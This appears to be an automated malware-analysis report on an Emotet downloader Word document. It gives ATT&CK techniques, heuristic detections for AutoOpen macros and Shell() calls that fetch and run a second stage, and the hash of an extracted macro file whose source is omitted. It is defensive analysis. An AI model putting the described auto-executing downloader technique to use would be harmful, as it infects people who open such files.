Verdict: MALICIOUS (Risk Score 242)
Malware Insights
MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function with a PowerShell command that it assembles at runtime by concatenating character codes. This command is designed to download and execute a second-stage payload, consistent with the ClamAV detection name 'Doc.Downloader.Emotet-6877457-0'. The presence of an AutoOpen macro, which runs automatically when the document is opened, further supports its malicious intent.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6877457-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6877457-0.
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14370 bytes |

SHA-256 of macros.bas: 45831b9ea1cb250dc7522f169432581477d9176133ca100100c3bdd9a043bc7a
Script preview: the first 1,000 lines of the extracted macro source (obfuscated VBA; the raw dump is omitted here).